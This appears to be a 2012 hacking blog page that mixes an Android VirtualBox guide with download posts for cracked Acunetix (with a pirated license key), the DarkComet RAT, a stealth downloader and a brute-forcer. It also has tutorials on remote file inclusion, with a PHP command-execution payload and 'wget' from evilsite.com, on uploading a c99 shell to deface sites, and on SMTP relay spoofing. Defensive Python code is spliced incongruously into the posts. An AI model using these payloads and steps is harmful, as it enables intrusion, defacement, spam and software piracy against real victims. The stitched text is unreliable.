ROLL

Friday, July 27, 2012

How To Install Android 4.0 VirtualBox




The mobile smartphone and tablet industry seems to have a very prominent divide, with a lot of consumers having their favorite operating system and choosing to stick to hardware which is powered by their chosen OS. Obviously fans of Apple's iOS use the iPhone and iPad devices, whereas Android lovers have a wide range of hardware to choose from, because the OS is available to multiple manufacturers.

But what happens if you are a die-hard fan of iOS or Windows Phone but still want to sample the delights that Android Ice Cream Sandwich has to offer? I personally have been an iPhone user for the last five years and will continue to be for the foreseeable future. But after recently getting my first taste of Android, I am severely tempted to shell out for a second device so I can have the benefits that both provide. For those that can't, or won't, purchase a second device, why not run Android 4.0 in virtualization on your desktop or laptop in order to see the Ice Cream Sandwich experience first hand?

Android 4.0 is an operating system in its own right, but instead of running it in a dual-boot setup, we install and run ICS within a free-of-charge virtualization application known as VirtualBox. VirtualBox runs like any other application or program on your machine, but offers the benefit of being able to install a secondary OS within it which can be invoked quickly by the user. For all those die-hard iOS and Windows Phone fans out there, this is a perfect way to experience the delights of Android.
Are you ready for a whirlwind journey down Ice Cream Sandwich lane? Buckle in and follow the simple steps below.

Step 1: Head over to the official Oracle VM VirtualBox site and download the relevant VirtualBox binary for your computer's operating system (Windows/Mac OS X/Linux/Solaris).

Step 2: Find the saved location of the downloaded VirtualBox binary and install it as you would any other native application, making sure to follow all on-screen prompts and instructions.


Step 3: Head on over to the VMLite website and download a copy of Ice Cream Sandwich that has been preconfigured for virtualization and features seamless mouse support for navigation. The download weighs in at 88MB, so it may take a while depending on your connection.



Step 4: Locate the downloaded 'Android-v4.7z' file and extract the contents from within.


Step 5: Once the Android-v4.7z file has been opened, locate a file within the archive called 'Android-v4.vbox', which, as you can tell by the file extension, is a preconfigured VirtualBox machine file.

Step 6: Double-click on the Android-v4.vbox file, which will load the VirtualBox application and boot up the ICS image.



Step 7: When the boot menu is presented in VirtualBox, press 'Start' on the top toolbar and then, if required, select the 'Android Startup from /dev/sda' option.


Step 8: All steps are complete. Android 4.0 ICS should now be booting up allowing you to enjoy that Android goodness.

Windows and Linux users may find that an alternative, specific version of Android 4.0 is required, which can be found by visiting the Android-x86 page. The performance of the Android ICS virtual installation will obviously not be as smooth as on an actual device built for the purpose, but it does give a feel of the OS, with apps being able to launch as well as widget customization.

ACUNETIX WEB VULNERABILITY SCANNER VERSION 8 + PATCH (CRACK) FULL

World's best and most popular vulnerability scanner, full version download


Features at a glance:
* Manipulation of inputs from URLs:
Acunetix WVS can automatically identify URL parameters and manipulate them to detect vulnerabilities. This technology is not present in any other competing vulnerability scanner.
Replace manual intervention with scanner intelligence
* Automatic custom 404 error page identification:
Acunetix WVS 8 can automatically determine if a custom error page is in use, and recognizes it without needing any recognition patterns to be configured before the scan.
* Interpret IIS 7 rewrite rules automatically:
Using the web application's web.config file, WVS 8 can automatically interpret rewrite rules without requiring any manual input.
Fix vulnerabilities while locking hackers out
* Imperva Web Application Firewall integration:
An exciting co-operation between Imperva and Acunetix; WVS 8 scan results can be imported into an Imperva Web Application Firewall and interpreted automatically as firewall rules.
Use WVS 8 as a true security scanning workhorse
* Multiple instance support:
Acunetix WVS 8 can be relaunched as multiple instances on the same machine, allowing the user to scan multiple websites and enabling further support for multi-user scenarios on the same server/workstation.
Re-scan without re-configuring
* Scan settings templates:
WVS 8 can save the settings for the scan of a specific application as a template, making it quick and easy to recall those exact settings for the same application each time it is scanned. This is particularly useful when auditing multiple sites, enabling the user to load the template for each site instead of re-configuring everything manually.
Launch a scan quicker than before
* Simplified Scan Wizard:
In addition to the introduction of Scan Settings Templates and automatic custom 404 error page recognition, the Scan Wizard contains far fewer options, so it's much easier and quicker to kick off a scan.
Access your results from anywhere and everywhere
* Web-based scheduler:
Accessible via a web interface, the new Scheduler allows administrators to download scan results from any workstation, laptop, or smartphone. The new Scheduler will automatically launch another instance of WVS when multiple web scans are due, preventing multiple processes from depending on the resources of one WVS instance, and thereby allowing scans to complete in less time.
Identify threats unseen by other black-box scanners
* New HTTP Parameter Pollution vulnerability class:
At the time of writing, Acunetix WVS 8 is the only scanner that tests for this security vulnerability.
Ensure complex scans will complete automatically and successfully
* Smart memory management:
The following settings have been added to optimise scanning efficiency:
  - Define number of files per directory
  - Limit number of subdirectories per website
  - Assign Crawler memory limit
Other new features:
  - Real-time Crawler status (number of crawled files, inputs discovered, etc.)
  - Support for custom HTTP headers in automated scans
  - Configurable log file retention
  - Detailed Crawler coverage report
  - Scan status included in report


Steps to get the full version of Acunetix web scanner v8 for free
First, go to this link and download the Acunetix scanner
ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q
Then install it, open the patch and click on Patch


Now open Acunetix you will be asked for some details
Enter below details
License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name: Hmily/[LCG]
Company: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110


Download PATCH (CRACK)

Mirror

Mirror

Wednesday, July 25, 2012

DPScan Drupal Security Scanner


The first security scanner for Drupal CMS has been released by Ali Elouafiq on his blog. His team developed a tool that will enumerate at least the modules used by Drupal, so we can simulate a white-box audit on our private machines.


This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster. Here is a little demonstration. After downloading the script (in Python), you simply type:
> python DPScan.py [website url]


Download Drupal Security Scanner 

Tuesday, July 24, 2012

BFT- Browser forensic tool


This software is an advanced local browser history search engine; in less than a few seconds it will extract the chosen keywords from the most famous web browsers, currently Internet Explorer, Google Chrome, Mozilla Firefox and Opera.
The program will attempt to find the keyword(s) in the history title and search; if the keyword is present or suspected to be, it will be displayed in the result list with its URL and title.
The software also gives you the possibility to edit the default keywords and of course add / modify your own keywords; to separate keyword subjects you can create your own keyword categories and only scan for the keywords in the chosen category.
The program is fully asynchronous, so it won't affect your work during the scan time, nor will it block the customization of keywords and keylists, and it can be canceled at any time.
Notice that this software will in no case alter the data; it will just open all history, even if archived, read-only and in the background.
This software was coded by DarkCoderSc (Jean-Pierre LESUEUR) using Delphi XE (Object Pascal IDE) and is fully FREE. Feel free to contact me to give feedback and report bugs or suggestions.

Monday, July 23, 2012

DarkComet RAT 5.3 Final


The final version of DarkComet RAT 5.3 is out, and don't worry guys, it's still the beginning of this (already) 4-year project. DarkCoderSc has a lot of ideas / work to implement in this project for the next versions / generations. Also I'm still working on a lite version, even if in this version you already can lift functions you don't want to use, using a new functionality in client settings.
Also VertexNet is not dead; it should be reborn soon as I have more free time and some other big projects to finalize. VertexNet will be totally recoded and of course linked to the DarkComet RAT.
[Change for 5.3.1 FIX 1]
- New action added in FTP Client, you can copy to clipboard the link of a file (useful for file downloader (URL))
- A very huge bug was fixed for stub startup, now it works fine 
- A bug fix when using user list thumbnails

Screenshot: [image not available]
[Current Changes 5.3]
- [FIX ] HTTP Flood more efficient
- [FIX ] In settings the last theme is correctly set in the combobox
- [FIX ] Auto SIN Refresh ratio successfully saved in config.ini
- [GUI ] Client Settings GUI changed, it is now more user friendly and fits with the rest of the DarkComet RAT design
- [GUI ] EULA at startup is more beautiful
- [GUI ] No-IP GUI revised
- [GUI ] User group GUI revised
- [FUNC] Search for update added in settings
- [GUI ] Keylogger GUI revised
- [FIX ] Now desktop correctly saves snapshots (if option enabled)
- [DEL ] Delete in full editor (read only, archived, temporary) attributes to avoid some stub problems if used
- [FIX ] Users list flags now support Serbia (Republic of Serbia)
- [FIX ] VIP Lounge price and URL fixed
- [FUNC] HOT: now you can choose which functions you need in the control center, and not be bloated with functions you might never use (in settings window)
- [FIX ] FTP Upload Keylogger Logs bug fixed
- [FUNC] FTP Wallet added in settings, it allows you to set up and test your FTP accounts for compatible DarkComet RAT FTP functions
- [FUNC] FTP Wallet is now linked to the Edit Server keylogger FTP management
- [FUNC] Now you can upload files from file manager to one of your FTP accounts (compatible with the FTP Wallet)
- [FUNC] Embedded FTP Client added to DarkComet, multithreaded using pure API, very fast and reliable and of course user friendly
- [FIX ] Bug fixed when module startup enabled, no more tons of processes on reboot etc.; supports Drag n Drop
- [FUNC] Drag and Drop added in File Manager to upload files from explorer directly to remote computer
- [FUNC] New downloader method implemented using pure low-level APIs instead of the shit URLDownloadUrlToFile bloated of crap
- [FUNC] File Downloader manager from control center has been improved and bug fixed, now files are correctly downloaded, also you can choose a PATH from the combobox shortcut
- [FUNC] Mass downloader from user list has been improved and multithreaded, also download bug is now fixed
- [FUNC] Same as for mass downloader, update from URL bug fixed and improved

DOWNLOAD DarkComet RAT 5.3 Final

Sunday, July 22, 2012

BRUTER (BINARY + SOURCE) WEB FORM/FTP/POP3/VNC/SMTP/MYSQL/IMAP/HTTP CRACKER



Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.
Home page: http://worawita.sourceforge.net/



Download

Acunetix Web Vulnerability Scanner 8 BETA




As the BETA program for Acunetix Web Vulnerability Scanner 8 keeps gaining momentum, all the great feedback received from our BETA participants has helped us achieve the BETA 2 milestone. This brings a significant number of improvements to WVS 8, including new usability features, component enhancements, and a series of bug-fixes.


WVS 8 BETA 2 Change Log
The following updates have been included in the BETA 2 build of WVS 8:


Featured Improvements
Additional .NET AcuSensor support for .NET versions 3, 3.5, 4
Improved blind SQL injection timing tests for PostgreSQL
Improved blind SQL injection timing tests for request-timeout situations
Logs are now flushed to the log-file every 10 seconds when running in console mode
Scheduler feature: notification bar appears if the connection with the server is lost
Bug Fixes
Crash (runtime passive analysis) when "Disable Crawler Alerts" option is enabled
Problem with logging of HTTP_Anomalies when running multiple instances
Problem with writing to temp folder when running multiple instances
Issue with saving application logs to an invalid folder when running the Scheduler
Crash when multiple instances of WVS try to detect custom 404 error-page patterns
Scan does not resume correctly when the Scheduler automatically resumes a scan
Issue with retest functionality for web application scripts
Proxy crash, commonly when the process is already executing
Settings in use by another instance cannot be saved as a Scan Settings Template
Reporter crash when the text in the alert details is too long
Periodical vulnerability reports show incorrect publishing date
Database ID allocation is now synchronized between multiple WVS instances
Scan results cannot be downloaded from the Scheduler since Internet Explorer 7 cache is not used
HTML report format is missing from the Scheduler web interface
Installer assigns full permissions to the license file (non-admin users receive an error when scanning)
Fixed the Scheduler’s Add Scan dialog on Internet Explorer 9
Errors related to a browser-tab do not appear if a different tab is being viewed
Malfunction with some Advanced Penetration testing tools when used through a proxy server
XSS tests are no longer case-sensitive
Scheduler returns invalid error message when connecting to password-protected applications
Scheduler not scanning password-protected applications
Crash with AcuSensor for .NET
False positives are saved for each user instead of globally
Changes to application settings not synchronized across multiple instances
Typos in UI
Reporter RTF-export malfunction
Reporter sets incorrect filename for exported and saved reports
Text wrap working inconsistently across reports

The Acunetix WVS Version 8 user manual is available in PDF Format and also in HTML Format.



Download Acunetix WVS Version 8 BETA

CAINE 2.5.1 (SuperNova) A GNU/Linux Live Distribution



CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.
Currently the project manager is Nanni Bassetti.
CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.
The main design objectives that CAINE aims to guarantee are the following:
- an interoperable environment that supports the digital investigator during the four phases of the digital investigation
- a user-friendly graphical interface
- a semi-automated compilation of the final report
We recommend that you read the page on the CAINE policies carefully.
CAINE fully represents the spirit of the Open Source philosophy, because the project is completely open: everyone could take over the legacy of the previous developer or project manager. The distro is open source, the Windows side (WinTaylor) is open source and, last but not least, the distro is installable, giving the opportunity to rebuild it in a brand new version and so giving a long life to this project.

CHANGELOG CAINE 2.5.1 "SuperNova"
Kernel 2.6-32.35 
ADDED:
ZFS Fuse 
exFat support 
Epiphany browser 
new mounter 
new TSK (Sleuthkit)
some fixings
New NAUTILUS Scripts
ataraw 
bloom 
fiwalk 
xnview 
NOMODESET in starting menu 
xmount 
sshfs 
Reporting by Caine Interface fixed 
xmount-gui 
nbtempo 
fileinfo 
TSK_Gui 
Raid utils and bridge utils
SMBFS
BBT.py
------------
Windows Side:
Wintaylor updated & upgraded


RBFstab and Mounter
1) "rbfstab" is a utility that is activated during boot or when a device is plugged in. It writes read-only entries to /etc/fstab so devices are safely mounted for forensic imaging/examination. It is self-installing with 'rbfstab -i' and can be disabled with 'rbfstab -r'. It contains many improvements over past rebuildfstab incarnations. Rebuildfstab is a traditional means for read-only mounting in forensics-oriented distributions.
2) "mounter" is a GUI mounting tool that sits in the system tray. Left-clicking the system tray drive icon activates a window where the user can select devices to mount or un-mount. With rbfstab activated, all devices, except those with volume label "RBFSTAB", are mounted read-only. Mounting of block devices in Nautilus (file browser) is not possible for a normal user with rbfstab activated, making mounter a consistent interface for users.
by John Lehr 
Live Preview Nautilus Scripts

CAINE includes scripts activated within the Nautilus web browser designed to make examination of allocated files simple. Currently, the scripts can render many databases, internet histories, Windows registries, deleted files, and extract EXIF data to text files for easy examination. The Quick View tool automates this process by determining the file type and rendering with the appropriate tool. 
The live preview Nautilus scripts also provide easy access to administrative functions, such as making an attached device writeable, dropping to the shell, or opening a Nautilus window with administrator privileges. The "Save as Evidence" script will write the selected file(s) to an "Evidence" folder on the desktop and create a text report about the file containing file metadata and an investigator comment, if desired. 
A unique script, "Identify iPod Owner", is included in the toolset. This script will detect an attached and mounted iPod Device, display metadata about the device (current username, device serial number, etc.). The investigator has the option to search allocated media files and unallocated space for iTunes user information present in media purchased through the Apple iTunes store, i.e., Real Name and email address. 
The live preview scripts are a work in progress. Many more scripts are possible as are improvements to the existing scripts. The CAINE developers welcome feature requests, bug reports, and critiques. 
The preview scripts were born of a desire to make evidence extraction simple for any investigator with basic computer skills. They allow the investigator to get basic evidence to support the investigation without the need for advanced computer forensics training or waiting upon a computer forensics lab. Computer forensics labs can use the scripts for device triage and the remainder of the CAINE toolset for a full forensic examination!
John Lehr
-------------
CASPER PATCH
The patch changes the way Casper searches for the boot media. By default, Casper will look at hard disk drives, CD/DVD drives and some other devices while booting the system (during the stage when the system tries to find the boot media with the correct root file system image on it, because common bootloaders do not pass any data about the media used for booting to an operating system in Live CD configurations). Our patch is implemented for CD/DVD versions of CAINE and enables CD/DVD-only checks in Casper. This solves the bug where Casper would select and boot fake root file system images on evidentiary media (hard disk drives, etc).
------------
Suhanov Maxim


DOWNLOAD CAINE 2.5.1 - SUPERNOVA

Comet Beam v1.0 BETA



Description:
This little software will download a single file or multiple files at the same time, totally stealthily.


The stub is only ~24KiB and, packed, ~14KiB.


WARNING: Like DarkComet RAT, this software is considered malware by your antivirus because it can be used to commit bad actions; in no case does it contain viruses or related spyware.


Download Comet Beam v1.0 BETA

Remote File Inclusion (RFI) – Tutorial

What is RFI?
RFI stands for Remote File Inclusion. An example of RFI is the bloated "C99" script. As good as this script is, it's not practical: it's too big and fills the access logs. It's highly noticeable.
What is the point of it?
Contrary to popular belief, not all website hacking is SQL injection. RFI is great because you can get access to and edit all files on the server; it makes defacements and stealing classified material as easy as ... wget?
What do I need to be able to do this?
Well basically, a web browser, a simple PHP RFI script (I will teach you a simple one) and some basic knowledge of BASH (most servers are Linux/Unix, so you might need this).
Let's go
Okay! So, to start with we need a vulnerable site... How do you find these? Well, a g00gle d0rk can help you... a lot. RFIs work by tricking the server into downloading and executing code that's not actually on it. Say a website was
http://shittysite.com/index.php?page=about
This could be a site that pulls in .txt documents to display as pages, very very insecure, yet people still do it. Anyway, this probably uses the PHP include function, and we can exploit this... How?
http://shittysite.com/index.php?page=http://evilsite.com/ourscript.txt
Now this could work, it could work quite well. If the site is vulnerable something would happen, but I will get into what in a minute.
So, you might have noticed that I added the .txt extension; this might not work, as ?page=about had no .txt extension. This could be because the script automatically appends the .txt file extension (the error you will get is something about it not being able to include ourscript.txt.txt). Now, as it is appending .txt, we can just put ourscript and it will still work; however, if it auto-appends something along the lines of .php then we have to use a null byte which is .
Okay, so what do we actually put into ourscript.txt before we do this? Well, it could be something like the C99, but unless that script is uploaded instead of included you will get a ton of errors and none of the features will work, so instead we have to build our own little script to get this baby working.
Code :
<?php

echo "<script>alert(1337);</script>";
echo "Executing command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);

?>
Something like that will work, as we can send a command to the Linux/Unix server in bash as well as testing if it's RFI vulnerable with the alert box.
Ok, so if it worked we are in luck, as we can now send a few commands to the server.
To start with let's try and list all the documents in the current directory. Anyone who knows any bash will know that the list command is ls, not dir.
So we do:
http://shittysite.com/index.php?cmd=ls&page=http://evilsite.com/ourscript
That then sends the cmd that we put into our script, and starts to list the documents... This is great! Now we can do anything, anything at all; we can deface the current page using something as simple as
cmd=echo This site got pwn3d by hacker > index.php
That will re-write index.php and pwn it (or in the case of a website with .txt extensions you will want to put this into one of the .txt files).
We can download, remove, rename, anything! But that means you need to know some bash. In case you don't, not all is lost! You can use the 'wget' function to download a c99 script.
Ok, so how do we do that?
cmd=wget http://evilsite.com/c99.txt
Now as a .txt the script is going to be useless; well, we could use some LFI but we aren't going to, we are just going to rename it!
mv
Simples..
cmd=mv c99.txt hacked.php
Now by just going to hacked.php the C99 will work and the site can be pwned that way.
This is just a simple tutorial, not too advanced. It's meant to give an overview of RFI, not a complete guide.

How To Upload Shell And Deface – Tutorial

What we need:
1. A shell (will be provided)
2. A website vulnerable to SQLi
3. An image or file upload area on that vulnerable website
So firstly download the shell here.
What is a shell?
A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is undetected, so you should not get a warning from an anti-virus if you download it. (update: not undetected anymore)
I am not going to explain SQLi, just how to deface.
So now go get yourself a vulnerable site, hack it, get the admin login details and get the admin page address.
Now log in to the admin page with the admin details you got.
Go through the admin page until you find a place where you can upload a picture (usually a picture).
Now you have to upload the shell. If you don't get an error, it is all good.
Now to find the shell:
Go through the site until you find any image and, if you are using Firefox, right-click on it and "Copy Image Location".
Make a new tab and paste it there.
It will probably look something like this:
http://www.example.com/images/photonamehere.jpg
So now that we know that, change "/photonamehere.jpg" to "/c99ud.php.jpg" (without quotes).
Now a page will come up looking like this:
[screenshot not available]
It probably does not look exactly like that but will look similar.
Now you have access to all the files on the site.
What you want to do now:
Find index.php or whatever the main page is, and replace it with your HTML code for your deface page.
Then you can either delete all the other files OR (and I recommend this) let it redirect to the main page.
Keep in mind:
• Change the admin username and password
• The people have FTP access so you need to change that password too.
• Always use a proxy or VPN
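The double-extension trick above ("c99ud.php.jpg") is exactly what an upload handler has to catch. As an added example that is not from the original post, the Python below screens a constructed image upload by checking every extension in the name rather than only the last one, comparing the declared type with the file's magic bytes, refusing PHP open tags inside image data, and storing the file under a random server-chosen name; all sample files are constructed.

```python
"""Screen an image upload so a web shell cannot be stored under an image name.

Added example, not part of the original post: the double-extension trick it
describes ("c99ud.php.jpg") is refused by checking every extension in the
name, not just the last one, by comparing the declared type with the file's
magic bytes, and by renaming accepted files server-side so the uploader
never picks the stored name. All sample files are constructed.
"""
import os
import secrets

# Accepted image types and the leading bytes each must start with.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a misconfigured server may execute when they appear anywhere in
# the name (Apache AddHandler / MultiViews behaviour makes "x.php.jpg" risky).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp",
                     "aspx", "jsp", "cgi", "pl", "py", "sh", "htaccess"}


class UploadRejected(ValueError):
    """Raised with a short, log-friendly reason when an upload is refused."""


def validate_upload(filename, data):
    """Return the randomized name to store an accepted image under, else raise."""
    # Strip any path the client sent and refuse embedded null bytes outright.
    base = os.path.basename(filename.replace("\\", "/")).strip()
    if not base or "\x00" in base:
        raise UploadRejected("empty or malformed filename")
    parts = base.lower().split(".")
    extensions = [p for p in parts[1:] if p]
    if not extensions:
        raise UploadRejected("no file extension")
    if any(ext in SCRIPT_EXTENSIONS for ext in extensions):
        raise UploadRejected(f"script extension inside {base!r}")
    final = extensions[-1]
    if final not in IMAGE_MAGIC:
        raise UploadRejected(f"extension .{final} is not an accepted image type")
    if not data.startswith(IMAGE_MAGIC[final]):
        raise UploadRejected(f"content is not a {final} image")
    # Heuristic: a PHP open tag inside image data is a polyglot shell attempt.
    if b"<?php" in data.lower() or b"<?=" in data:
        raise UploadRejected("PHP open tag embedded in image data")
    # The client never chooses the stored name, so nothing it sent is reused.
    return f"{secrets.token_hex(16)}.{final}"


def screen(filename, data):
    """Convenience wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, validate_upload(filename, data)
    except UploadRejected as exc:
        return False, str(exc)


# Constructed samples exercising each check (no real files involved).
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    "c99ud.php.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    "shell.php": b"<?php echo 1; ?>",
    "cover.jpg": b"GIF89a" + b"\x00" * 16,
    "poly.gif": b"GIF89a" + b"<?php echo 1; ?>",
    "../../config.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        accepted, detail = screen(name, blob)
        print(f"{name:20} -> {'stored as ' + detail if accepted else 'REJECTED: ' + detail}")
```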

Tuesday, July 10, 2012

Hacking SMTP Mail Gateways

Mail Servers: They have their own language
There are many types and brands of e-mail servers used on the Internet. There's Sendmail, which has been around for a long time and is typically used on UNIX systems; Microsoft Exchange, a Microsoft product of course; and GroupWise, a Novell product, just to name a few.
Regardless of the services and options each flavor of mail server offers you, they all have one thing in common: they must abide by the rules of the SMTP communications standard and, in effect, speak a common language. If you want to know more about this, read the SMTP "Request For Comment", or RFC, located here.

SMTP Mail Relaying and Social Engineering

Mail Relaying: What's the big deal?
Although not a traditional vulnerability, one of the most common forms of SMTP misuse is e-mail relaying, or e-mail spoofing. This method is routinely used by spammers to distribute their unwanted and unsolicited information. In many cases, they set up their own mail servers, configured to allow mail relaying. However, if your SMTP gateway is not set up to prevent mail relay, the spammers will kindly use it. This is a very simple procedure and in most cases is completely automated.

Social Engineering Attack by E-mail
Another common use of e-mail relay and spoofing is social engineering attacks. We recently performed a security assessment for an organization where we were permitted to perform social engineering and denial-of-service attacks. It turned out that this company's SMTP server was not configured to prevent e-mail relaying. We attached to the SMTP gateway from the Internet, spoofed the e-mail address of one of the IT people, and sent an e-mail to ten end-users instructing them to "Shutdown their computers immediately because the IT team had detected a serious virus / or worm on their computer". All ten of the users did exactly as we asked. Imagine if we had sent this e-mail to the "everyone" e-mail distribution group. It probably would not have been a good day for the IT folks.
I want to make the point that I am writing this article for the purpose of education and awareness. The purpose is NOT to provide someone the information needed to abuse SMTP services.

Speaking the SMTP Language

The Basics of Hacking SMTP Gateways and Communications

There are a handful of methods in direct SMTP communication, but for the sake of this article we will only review a few items. These items, if the SMTP gateway you are attached to allows mail relaying, are all that is needed to successfully spoof or relay e-mail.
  • Our Target: "smtpmailserver.ontheinternet.com";
  • Our Tool: the good ole "telnet" client;
  • Our Objective: determine if mail relay is possible and execute it.
The following are the six commands (or steps) we will use to check for and execute a mail relay:
  1. "telnet": a communications client used to connect to SMTP port 25 on the target mail server;
  2. "helo": SMTP command used to introduce ourselves to the SMTP server;
  3. "mail from:": SMTP command to identify who the mail will be sent from;
  4. "rcpt to:": SMTP command telling the mail server who to send the e-mail to;
  5. "data": SMTP command that instructs the mail server that the text typed after this command is the body of our message;
  6. "(enter).(enter)": when we are finished writing our message we will hit the (enter) button, the period ".", then another (enter), and the mail will be queued for delivery.

Action: "telnet smtpmailserver.ontheinternet.com 25" - connect to our SMTP gateway, on port 25, using the telnet client.
Response: "220 smtpmailserver.ontheinternet.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Mon, 11 Apr 2005 11:15:50 -0400"
Result: You successfully connected to the server!

Action: "helo" - say hello to the gateway.
Response: "250 smtpmailserver.ontheinternet.com [10.1.1.x]"
Result: The gateway greets you!

Action: "rcpt to: person@targetdomain.com" - who are we sending the e-mail to?
Response: "250 2.1.5 person@targetdomain.com"
Result: We are close to sending our spoofed e-mail message!!!

Action: "data" (then hit enter) - tell the SMTP server we are writing our message next!
Response: "354 Start mail input; end with <CRLF>.<CRLF>" - the mail server is telling us to write our message, then type "enter", a period ".", then "enter" again.
Result: You type your message.

Action: (hit enter) type "." (hit enter) - tell the SMTP server we are finished writing our message!
Response: "250 2.6.0 <smtpmailserver WQm21OesnsI0000148e@smtpmailserver.ontheinternet.com> Queued mail for delivery"
Result: The SMTP mail server has just accepted your e-mail for delivery and has queued it for sending!

Conclusion

Automating The Process
As you can see, this process is pretty straightforward. Automating it is quite simple and can be done by writing a script in any number of languages. A script designed to send out mass mail can do so very quickly and efficiently. If you or your company's mail server were to be the target of e-mail relay, it could cause you a lot of trouble. It may even overwhelm your mail server to the point of causing a denial-of-service condition, effectively preventing you from sending legitimate mail.

Securing Your Mail Server
Preventing mail relay is usually pretty easy to do. On some mail servers it's as easy as ticking a checkbox. Others require a little more effort. For information regarding securing the few e-mail servers I mentioned above, you can review the following links:

Microsoft Exchange: Securing Exchange Communications
Novell GroupWise: Secure Message Concepts
Sendmail: Linux: Securing Sendmail
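As an added example that is not from the original article, the Python below is a minimal policy engine for the commands used in the telnet session above. It implements the relay check this section asks for (accept a recipient only when the mail is inbound to a local domain or the client is trusted) and goes one step beyond it: an untrusted outside client may not claim a sender in the local domain, which is the spoof the social-engineering story relied on. The host name is taken from the article; the local domains, trusted network and addresses are constructed.

```python
"""Minimal SMTP command handler that refuses open relay.

Added example, not from the original article: it understands the same
commands the telnet session above uses and applies the check the
"Securing Your Mail Server" section asks for, accepting a recipient only
when mail is inbound to a local domain or the client is trusted. It goes
one step beyond relay blocking: an untrusted outside client may not claim
a sender in a local domain, the spoof used in the social-engineering
story. Local domains, networks and addresses are constructed.
"""
from ipaddress import ip_address, ip_network

HOSTNAME = "smtpmailserver.ontheinternet.com"               # name used in the article
LOCAL_DOMAINS = {"targetdomain.com", "ontheinternet.com"}    # constructed: domains we deliver for
TRUSTED_NETS = [ip_network("10.1.1.0/24"), ip_network("127.0.0.0/8")]  # constructed internal LAN


def _address(arg):
    """Mailbox from 'FROM:<a@b>' or 'to: a@b'; '' for the null sender, None if malformed."""
    mailbox = arg.partition(":")[2].strip().strip("<>").strip()
    if mailbox == "":
        return ""
    local, at, domain = mailbox.rpartition("@")
    if not (at and local and domain) or " " in mailbox:
        return None
    return mailbox


def _domain(mailbox):
    return mailbox.rpartition("@")[2].lower()


class RelayGuard:
    """Per-connection state; handle() returns the reply line, or None while reading DATA."""

    def __init__(self, client_ip, authenticated=False):
        self.client_ip = ip_address(client_ip)
        self.trusted = authenticated or any(self.client_ip in net for net in TRUSTED_NETS)
        self.sender, self.recipients, self.body = None, [], []
        self.in_data = False
        self.queued = []  # (sender, recipients, body) accepted for delivery

    def handle(self, line):
        if self.in_data:
            if line == ".":
                self.queued.append((self.sender, list(self.recipients), "\n".join(self.body)))
                self.sender, self.recipients, self.body, self.in_data = None, [], [], False
                return "250 2.6.0 Queued mail for delivery"
            self.body.append(line)
            return None
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {HOSTNAME} [{self.client_ip}]"
        if verb == "MAIL":
            sender = _address(arg)
            if sender is None:
                return "501 5.1.7 Bad sender address syntax"
            # Anti-spoofing: only trusted clients may send as one of our own domains.
            if _domain(sender) in LOCAL_DOMAINS and not self.trusted:
                return "550 5.7.1 Sender address rejected: authentication required"
            self.sender, self.recipients = sender, []
            return "250 2.1.0 Sender OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 5.5.1 Need MAIL command"
            rcpt = _address(arg)
            if not rcpt:
                return "501 5.1.3 Bad recipient address syntax"
            # Anti-relay: inbound to a local domain, or outbound from a trusted client only.
            if _domain(rcpt) in LOCAL_DOMAINS or self.trusted:
                self.recipients.append(rcpt)
                return f"250 2.1.5 {rcpt}"
            return "550 5.7.1 Unable to relay"
        if verb == "DATA":
            if not self.recipients:
                return "503 5.5.1 No valid recipients"
            self.in_data = True
            return "354 Start mail input; end with <CRLF>.<CRLF>"
        if verb == "QUIT":
            return "221 2.0.0 Service closing transmission channel"
        return "500 5.5.2 Command not recognized"


def run_session(client_ip, lines, authenticated=False):
    """Feed client lines to a fresh RelayGuard and return its replies (DATA body lines produce none)."""
    guard = RelayGuard(client_ip, authenticated)
    return [reply for reply in map(guard.handle, lines) if reply is not None]


if __name__ == "__main__":
    # The article's relay attempt, as seen from an untrusted address outside the LAN.
    for reply in run_session("203.0.113.7", ["helo", "mail from: <spammer@elsewhere.example>",
                                            "rcpt to: <victim@otherdomain.example>", "data", "quit"]):
        print("S:", reply)
```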

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.